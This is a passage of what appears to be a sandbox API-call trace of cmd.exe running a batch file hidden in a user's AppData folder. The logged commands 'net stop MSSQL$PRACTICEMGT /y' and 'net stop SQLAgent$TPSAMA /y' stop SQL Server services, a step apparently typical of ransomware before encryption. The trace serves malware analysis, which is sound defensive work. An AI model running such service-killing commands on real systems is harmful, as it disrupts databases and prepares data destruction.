lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0210.948] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0210.949] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.949] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0210.949] SetErrorMode (uMode=0x0) returned 0x1 [0210.949] GetProcessHeap () returned 0x3e0000 [0210.949] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0210.949] GetProcessHeap () returned 0x3e0000 [0210.949] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0210.950] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0210.950] GetProcessHeap () returned 0x3e0000 [0210.950] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0210.950] GetProcessHeap () returned 0x3e0000 [0210.950] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0210.950] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0210.950] GetProcessHeap () returned 0x3e0000 [0210.950] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0210.950] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0210.950] GetProcessHeap () returned 0x3e0000 [0210.950] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0210.951] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0210.951] GetProcessHeap () returned 0x3e0000 [0210.951] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0210.951] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.952] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0210.952] GetLastError () returned 0x2 [0210.952] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0210.952] GetLastError () returned 0x2 [0210.953] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.953] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0210.953] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0210.953] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0210.953] GetLastError () returned 0x2 [0210.954] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0210.954] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0210.954] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.954] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0210.954] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0210.955] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0210.955] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0210.955] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQL$PRACTICEMGT /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQL$PRACTICEMGT /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQL$PRACTICEMGT /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x664, dwThreadId=0xac8)) returned 1 [0210.959] CloseHandle (hObject=0x78) returned 1 [0210.959] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0210.959] GetProcessHeap () returned 0x3e0000 [0210.959] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0210.959] GetEnvironmentStringsW () returned 0x3f8408* [0210.959] GetProcessHeap () returned 0x3e0000 [0210.959] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0210.959] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0210.959] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0211.095] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0211.095] CloseHandle (hObject=0x74) returned 1 [0211.095] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0211.095] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0211.095] GetProcessHeap () returned 0x3e0000 [0211.095] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0211.095] GetEnvironmentStringsW () returned 0x3f8408* [0211.095] GetProcessHeap () returned 0x3e0000 [0211.095] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0211.095] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0211.096] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0211.096] GetProcessHeap () returned 0x3e0000 [0211.096] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0211.096] GetEnvironmentStringsW () returned 0x3f8408* [0211.096] GetProcessHeap () returned 0x3e0000 [0211.096] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0211.096] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0211.096] GetProcessHeap () returned 0x3e0000 [0211.096] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0211.096] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0211.096] _get_osfhandle (_FileHandle=1) returned 0x264 [0211.096] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0211.096] _get_osfhandle (_FileHandle=1) returned 0x264 [0211.096] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0211.096] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0211.096] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0211.097] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0211.097] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0211.097] SetConsoleInputExeNameW () returned 0x1 [0211.097] GetConsoleOutputCP () returned 0x1b5 [0211.097] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0211.097] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.097] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0211.097] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0211.097] _get_osfhandle (_FileHandle=3) returned 0x74 [0211.097] SetFilePointer (in: hFile=0x74, lDistanceToMove=4893, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x131d [0211.098] GetProcessHeap () returned 0x3e0000 [0211.098] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0211.098] GetProcessHeap () returned 0x3e0000 [0211.098] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0211.098] GetProcessHeap () returned 0x3e0000 [0211.098] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0211.098] GetProcessHeap () returned 0x3e0000 [0211.098] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0211.098] GetProcessHeap () returned 0x3e0000 [0211.098] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0211.098] GetProcessHeap () returned 0x3e0000 [0211.098] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0211.098] GetProcessHeap () returned 0x3e0000 [0211.098] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0211.098] GetProcessHeap () returned 0x3e0000 [0211.098] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0211.098] GetProcessHeap () returned 0x3e0000 [0211.098] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0211.098] GetProcessHeap () returned 0x3e0000 [0211.098] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0211.098] GetProcessHeap () returned 0x3e0000 [0211.098] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0211.098] GetProcessHeap () returned 0x3e0000 [0211.098] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0211.098] GetProcessHeap () returned 0x3e0000 [0211.098] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0211.098] _get_osfhandle (_FileHandle=3) returned 0x74 [0211.098] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x131d [0211.098] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x5a4, lpOverlapped=0x0) returned 1 [0211.098] SetFilePointer (in: hFile=0x74, lDistanceToMove=4922, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x133a [0211.098] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=29, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLAgent$TPSAMA /y\r\n\r\n\nServiceΓÇ¥ /y\r\n¥ /y\r\nures\r\nnded\r\n") returned 29 [0211.099] _get_osfhandle (_FileHandle=3) returned 0x74 [0211.099] GetFileType (hFile=0x74) returned 0x1 [0211.099] _get_osfhandle (_FileHandle=3) returned 0x74 [0211.099] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x133a [0211.099] GetProcessHeap () returned 0x3e0000 [0211.099] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0211.099] GetProcessHeap () returned 0x3e0000 [0211.099] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0211.102] _tell (_FileHandle=3) returned 4922 [0211.102] _close (_FileHandle=3) returned 0 [0211.102] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0211.102] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0211.102] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0211.102] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0211.102] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0211.102] _wcsicmp (_String1="net", _String2="CD") returned 11 [0211.102] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0211.103] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0211.103] _wcsicmp (_String1="net", _String2="REN") returned -4 [0211.103] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0211.103] _wcsicmp (_String1="net", _String2="SET") returned -5 [0211.103] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0211.103] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0211.103] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0211.103] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0211.103] _wcsicmp (_String1="net", _String2="MD") returned 1 [0211.103] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0211.103] _wcsicmp (_String1="net", _String2="RD") returned -4 [0211.103] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0211.103] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0211.103] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0211.103] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0211.103] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0211.103] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0211.103] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0211.103] _wcsicmp (_String1="net", _String2="VER") returned -8 [0211.103] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0211.103] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0211.103] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0211.103] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0211.103] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0211.103] _wcsicmp (_String1="net", _String2="START") returned -5 [0211.103] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0211.103] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0211.103] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0211.103] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0211.103] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0211.103] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0211.103] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0211.103] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0211.103] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0211.103] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0211.104] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0211.104] SetErrorMode (uMode=0x0) returned 0x1 [0211.104] GetProcessHeap () returned 0x3e0000 [0211.104] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0211.104] GetProcessHeap () returned 0x3e0000 [0211.104] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0211.104] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0211.104] GetProcessHeap () returned 0x3e0000 [0211.104] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0211.104] GetProcessHeap () returned 0x3e0000 [0211.104] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0211.105] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0211.105] GetProcessHeap () returned 0x3e0000 [0211.105] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0211.105] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0211.105] GetProcessHeap () returned 0x3e0000 [0211.105] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0211.105] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0211.105] GetProcessHeap () returned 0x3e0000 [0211.105] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0211.106] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.106] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0211.106] GetLastError () returned 0x2 [0211.107] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0211.107] GetLastError () returned 0x2 [0211.107] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.107] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0211.108] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0211.108] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0211.108] GetLastError () returned 0x2 [0211.108] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0211.108] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0211.109] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.109] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0211.109] SetErrorMode (uMode=0x0) returned 0x1 [0211.109] GetProcessHeap () returned 0x3e0000 [0211.109] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0211.109] GetProcessHeap () returned 0x3e0000 [0211.109] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0211.110] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0211.110] GetProcessHeap () returned 0x3e0000 [0211.110] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0211.110] GetProcessHeap () returned 0x3e0000 [0211.110] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0211.110] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0211.110] GetProcessHeap () returned 0x3e0000 [0211.110] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0211.110] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0211.110] GetProcessHeap () returned 0x3e0000 [0211.110] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0211.111] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0211.111] GetProcessHeap () returned 0x3e0000 [0211.111] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0211.111] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.112] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0211.112] GetLastError () returned 0x2 [0211.112] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0211.112] GetLastError () returned 0x2 [0211.113] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.113] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0211.113] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0211.113] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0211.113] GetLastError () returned 0x2 [0211.114] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0211.114] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0211.114] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.114] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0211.114] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0211.115] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0211.115] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0211.115] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLAgent$TPSAMA /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLAgent$TPSAMA /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLAgent$TPSAMA /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x720, dwThreadId=0xb0c)) returned 1 [0211.119] CloseHandle (hObject=0x74) returned 1 [0211.119] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0211.119] GetProcessHeap () returned 0x3e0000 [0211.120] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0211.120] GetEnvironmentStringsW () returned 0x3f8408* [0211.120] GetProcessHeap () returned 0x3e0000 [0211.120] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0211.120] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0211.120] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0211.246] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0211.246] CloseHandle (hObject=0x78) returned 1 [0211.246] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0211.246] SetEnvironmentVariableW 